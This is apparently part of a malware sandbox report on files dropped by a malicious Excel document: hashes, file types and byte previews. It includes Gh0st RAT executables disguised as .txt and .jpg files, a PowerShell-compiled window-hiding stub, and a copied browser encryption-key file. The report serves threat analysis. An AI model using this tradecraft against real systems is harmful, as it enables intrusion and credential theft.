                                                                                                                                                                                                    Preview: @...e...................................k............@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)Q.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\CBC40000
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):115078
                                                                                                                                                                                                    Entropy (8bit):7.925311650638153
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:xpHzSJtwYold/FMeHxvPnelLDCfXoCFZhA:bIwYoLH9PnedDCfLHhA
                                                                                                                                                                                                    MD5:75B07DAB591787C95F778CDE2F9310FF
                                                                                                                                                                                                    SHA1:A0C649009C4CC295CDB70F260993165700088BCB
                                                                                                                                                                                                    SHA-256:80D29F8A4C1ECA0CC3095BABB0AE72A38161F870C057CDE94DBA007F0B305067
                                                                                                                                                                                                    SHA-512:9E75EDA7641E5FA0550E4483C986C97DF442BE343C80E3A919A07996114B6C2A983FEF341D824467F39216DD0169472B576D8E7B8014894908D28B1DB1DB6F06
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .U.N.1..#...\.L.H..N9......4q..l......."P.F .........?.YS.@D.]......I.......>e.&.0.A...|...........l.R8........p...hE..8.A...?..N....Ku..l...x6......v..X..T-.!.-E".../$.......%..C..p...iB....!%*.._...`..T.,....D0.M...2K18......rd...[ja...;..........t.......X.L.i.g..2.+'..(&.{W..../......G...\PW..q.FY.w.q.j.B..?.Ht....w...........]..`VQ..!..?.w......]..itF.^.....u .I.j.;.+F..?...`W..p..#.........PK..........!.;.!............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RES578D.tmp
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2188
                                                                                                                                                                                                    Entropy (8bit):2.7040707917513203
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:p+fqsluDfHqWhKENpXffI+ycuZhNUakSgPNnq92pEYzW9I:cqsqKMK4lH1ulUa34q9NO
                                                                                                                                                                                                    MD5:4AA337D311AEC2F568C910ABE633449D
                                                                                                                                                                                                    SHA1:26A8756F1F2E1F81F29E74489E2E8B27438751ED
                                                                                                                                                                                                    SHA-256:D16FD2EB016F7E981CFC46CF56C4BCB4EC2612DA3083ADAED26F02401D33DB32
                                                                                                                                                                                                    SHA-512:511D405DCAFDB5334C96EA7BB63FFCB85F7FCF23CAAA00E555CCC19047D1930B8DE832C952C2A546F40D897EB57DFB0CF61844A111883F9EABE5A30D73D12E9C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ........T....c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP................o.o.m..<....Mk...........4.......C:\Users\user\AppData\Local\Temp\RES578D.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Documents.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Test1.txt
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):286720
                                                                                                                                                                                                    Entropy (8bit):7.322095096487576
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:68Fqx8a90KqAVpYok5NUE9N4V5PtFLAM1BoBes+i:68ox8a9XqSYVr9N4V5nL1iBes
                                                                                                                                                                                                    MD5:1199FCAA4DC6DF0A9FD128045DC57755
                                                                                                                                                                                                    SHA1:1F0C0A3A0EFE1204D21ACF9855ABE48CAB6375C1
                                                                                                                                                                                                    SHA-256:70278D9FB1DFFEB87D9D2866DC6E5769BE83DC2AF06C5E5B4B1271BBBE231925
                                                                                                                                                                                                    SHA-512:5F6DF352FF087B8F15A9B27DFD10078A74AC247120C1EB2209211FF89AAD0B296C61C6DC8FB896E879D8C71B38F97C3FC42231C479483D2310533D2E1076C2AE
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test1.txt, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test1.txt, Author: Florian Roth
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.....................`....................@..........................p..............................................L...P....0..h,...................`..........................................................t............................text............................... ..`.rdata..............................@..@.data...H...........................@....rsrc...h,...0...0... ..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Test2.gif
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:PNG image data, 843 x 685, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):52573
                                                                                                                                                                                                    Entropy (8bit):7.929770193106239
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:q8as4TUSrbfoAKgxCllllllhy8PZMPAW07jI:ETUkJkllllllhyKnI
                                                                                                                                                                                                    MD5:BD077FF603FB6873277C658C2FA9F84B
                                                                                                                                                                                                    SHA1:2F70973669FEABE962DA03DD4F4A25CE789EF7A1
                                                                                                                                                                                                    SHA-256:12CE388F55373DBAA49259D196B2B692EF70A2CD1999406BB46D562AA9C56168
                                                                                                                                                                                                    SHA-512:205C3E7CB055179F24CBA13BC381A358648221A37F1F05EFFBDE91814794941FFDCFB3D41567B3E86970683180570D4CE18CE4A49EA729202A989200A91737B7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR...K.........yLb.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..ix.....|I...^.{.3.af.xMH2q..$L2..'q...c[.1.........1.*.........hA.I......b..OuUWWWW..st$.Z./..T?U.Tuw...-.]..R..... .. ..RM.px.........@Jk6.>.9<:.....N.j. .. ..z.....&O8<.;.. .....rt......l.!.. ....(..Z...... .. (....;.A..A...t.9....g.....f,..c.o~t.C..8x......9..;........../....A..A.U....?uFj..&W.o>|..'_~.%...?.${.8.~....eD*...)........mYY..ef.e.n. e4i....m...[.n.s.=...>zBk.m.8q.. .. .IS....D.Z{.w.&.P..QE....N.YY.B...+W>.8y.c..G;....t..q_.FR..........u...SO=.~...H..++...b].._.H..,......OM..*.*+....S.z]M}.CG.k.:..u..k..W....*/)_S.Fk..p...A..ARd.._..'...s....{..;5.4.px/.-.|......O|.....u4..k.......c}...t4.e/...G..=..[.=wAF.....~.O..]{{.....}....^a~...TXWYUTPT..j.....s....#.W..Zm..v..S.~...G.!.w.....*.....4..8.)*....<Q.w.&.*.....O.......)[.-.(u....[..^......B5.8...a/....>....G.Z<..'#.K..............D"g...CP.Juf^..."..S.T.468<..........ON^..J..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):339293
                                                                                                                                                                                                    Entropy (8bit):7.452811147071355
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:68Fqx8a90KqAVpYok5NUE9N4V5PtFLAM1BoBes+ihJllllllhyKnI:68ox8a9XqSYVr9N4V5nL1iBesLJllllm
                                                                                                                                                                                                    MD5:DD27F33FCD6F1FA4C67EE05D836795C2
                                                                                                                                                                                                    SHA1:892A94B23AB7F4250AE62405C6E6747056173B35
                                                                                                                                                                                                    SHA-256:504E0489472D6107D56D6D4F88600200B055BD97C3158EF1C9A54EA38074351A
                                                                                                                                                                                                    SHA-512:78B9867A74E3564B3BA4C18F9FA625E6D6B40066F575844BC59A766DA131CAC9C945A59F197B5738E90A8472000DA7A8CB38A27D57AC46E643C75D9BA3E66D05
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.....................`....................@..........................p..............................................L...P....0..h,...................`..........................................................t............................text............................... ..`.rdata..............................@..@.data...H...........................@....rsrc...h,...0...0... ..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wkcwt4o.03d.ps1
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: 1
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3kf5esz.2v3.psm1
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: 1
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uogviepe.ktp.psm1
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: 1
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uw12ulry.jxg.ps1
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: 1
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                                                    Entropy (8bit):3.101805487886205
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBQak7YnqqqVPN5Dlq5J:+RI+ycuZhNUakSgPNnqX
                                                                                                                                                                                                    MD5:E96FCC6FFB6D0CDA3C1E8B14E04D6BB1
                                                                                                                                                                                                    SHA1:F8BF48E30342EF5181A2BC62271EA473C332B171
                                                                                                                                                                                                    SHA-256:F06C1253D2BFA5723642491DC1B9CD2B30828086D99D9FF66AA87BC43E6CED35
                                                                                                                                                                                                    SHA-512:513D7B7589D08D075D925FD7F5160C5295ADBA7CE30FE01A3CD6CD9E60AEC0614639A6357EF070EE0934DECB7910141D5E3D4E676381E087681FCE8E5AEB3803
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.v.q.a.p.e.5.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.v.q.a.p.e.5.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.0.cs
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:C++ source, UTF-8 Unicode (with BOM) text
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):227
                                                                                                                                                                                                    Entropy (8bit):4.717813898714253
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:V/DsYLDS81zumJFR66rl0F0SRkoSdt+imlwy:V/DTLDfuCRlrmF/9Amlwy
                                                                                                                                                                                                    MD5:C8539D40B0344511F4CB0BC03C897CA5
                                                                                                                                                                                                    SHA1:0CDEC0D89F33ED83A76B545EE94A1E0471C1A955
                                                                                                                                                                                                    SHA-256:F852CD7B0364BD9D393F8F96008E3BE0E1EC86373D3E8EE83C32D4B69DB87750
                                                                                                                                                                                                    SHA-512:A338C34406FBDEB8701E75AC6DBD1DEB5F268C144B4D33EFD0FC2AB56F90DE81BFAB3AD31B42E164B63EF205DF76109F0D79EB35C5540C5E95ADA1B9B742079D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .using System;.using System.Runtime.InteropServices;..namespace nAtIvE.{. public class Win. {. [ DllImport ( ("user32" + "." + "dll" ) ) ] public static extern bool ShowWindow(int handle , int state) ; .. }..}.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):369
                                                                                                                                                                                                    Entropy (8bit):5.21517798379197
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fDD0zxs7+AEszIwkn23fDN:p37Lvkmb6KRff0WZEifZ
                                                                                                                                                                                                    MD5:84A2B4EA4EAC4B80CD95A6FB6B93B142
                                                                                                                                                                                                    SHA1:1DB1F3671ECC2455775CB2C30303030B2D9083B1
                                                                                                                                                                                                    SHA-256:03EA981AD664412B3087B1B6411FCC1875A732DA901D5B6E4D9B2FF845066193
                                                                                                                                                                                                    SHA-512:B45A52DC74ACA1F2AD61DF202F4CEA25CD457CE88F264A662B61F8B34B24B193F72602D1128EB73E861142ABA2B6F4780158B2837316688E4EC77BED1969800A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.0.cs"
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                    Entropy (8bit):2.714358747964494
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:etGS6c/Bepsl/d8d7itoe9oltkZfqDZaHUxbI+ycuZhNUakSgPNnq:66TyuMtosoQJo4HKb1ulUa34q
                                                                                                                                                                                                    MD5:456C8D5C780ED32B2430C9440E05B1C9
                                                                                                                                                                                                    SHA1:026E92BAEA1757A4D386DBA4110944897D70B16D
                                                                                                                                                                                                    SHA-256:DF3B042430D193D17DA3790B839C8FD6790AC80964CB45A9B60196E9DC6BFA36
                                                                                                                                                                                                    SHA-512:56A0B5F116B33A5E055309488820174A1C75115AC6B9E4127293A5C3E37B245159B4FF9F2A9C6CB0061444D32ABE6A22E4F6FC0ADCF6BAC5D2C192B1F26E3AF5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.._...........!................~#... ...@....... ....................................@.................................$#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l.......#~..p.......#Strings....l.......#US.t.......#GUID.......H...#Blob...........G.........%3............................................................2.+...w.W.....W.......................................... 9.....P ......D.........J.....Q...D.....D...!.D.....D.............'.......9......................................."........<Module>.mvqape5o.dll.Win.nAtIvE.mscorlib.System.Object.ShowWindow..ctor.handle.state.System.Runtime.CompilerSe
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.out
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):412
                                                                                                                                                                                                    Entropy (8bit):4.871364761010112
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                                                                                    MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                                                                                    SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                                                                                    SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                                                                                    SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\.CxCK.C.tmp
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):87300
                                                                                                                                                                                                    Entropy (8bit):6.102677495198111
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:CdLUGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR1:CdLUFcbXafIB0u1GOJmA3iuR1
                                                                                                                                                                                                    MD5:D5D29F3050E6C920ECA7B7276AB537CE
                                                                                                                                                                                                    SHA1:CE24853BBE0BCC044B2216385612CBA2A754E4D4
                                                                                                                                                                                                    SHA-256:C0963F0007CBC3AA6AA3B9A906173730BB6B7644BE9D3DA903D64B42D4387FDB
                                                                                                                                                                                                    SHA-512:3BB59E005958968218FF3763B831B8898C47A6543CD6B017D52DA9176DBE0D6D545F25FB901D11DA2B30D9BA86DCB59E0F295A9C1B14579C8B764849CFB76D8C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601451012154773e+12,"network":1.601451004e+12,"ticks":765205613.0,"uncertainty":4222325.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Fri Jan 8 07:34:25 2021, atime=Fri Jan 8 07:34:25 2021, length=12288, window=hide
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):904
                                                                                                                                                                                                    Entropy (8bit):4.650502527518261
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8z0XU7duCH2KOshY8D4ys7a9m+WrjAZ/DYbDvSeuSeL44t2Y+xIBjKZm:8zLishY8M0kAZbcD17aB6m
                                                                                                                                                                                                    MD5:7B65EE94E2707ECE5A82FFC400960F12
                                                                                                                                                                                                    SHA1:9B19E4578BB104328DED8B3BBAC9BD395023FD7E
                                                                                                                                                                                                    SHA-256:AC91660AA55E52EF9141E5B777462FF708E04E199B03DA3B3333E138C8B4EBA7
                                                                                                                                                                                                    SHA-512:3448EA79D28F87DEE3501ADCB05BCC608FD863A4697DD392829AC3FCA716BE0724E7E09E3ECDEE3C70B04AF459179424D5A6509B242FF73E0E353300BEBF48A9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: L..................F.............-...(D.....lx3......0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R@D....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..(R@D....#J....................$._.j.o.n.e.s.....~.1.....(RMD..Desktop.h.......N..(RMD.....Y..............>.......x.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......179605...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Telex06012020.LNK
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Fri Jan 8 07:34:25 2021, atime=Fri Jan 8 07:34:25 2021, length=129024, window=hide
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2140
                                                                                                                                                                                                    Entropy (8bit):4.668952347199407
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:86zYkl/LishY8AhAfuhyAHbutDh7aB6my6zYkl/LishY8AhAfuhyAHbutDh7aB6m:86sktitxhRHKKB6p6sktitxhRHKKB6
                                                                                                                                                                                                    MD5:5F2DBB344382930A5A49AE55658A9107
                                                                                                                                                                                                    SHA1:58C201CBE43F4C8066BE3A4D50F8AADBDF67C979
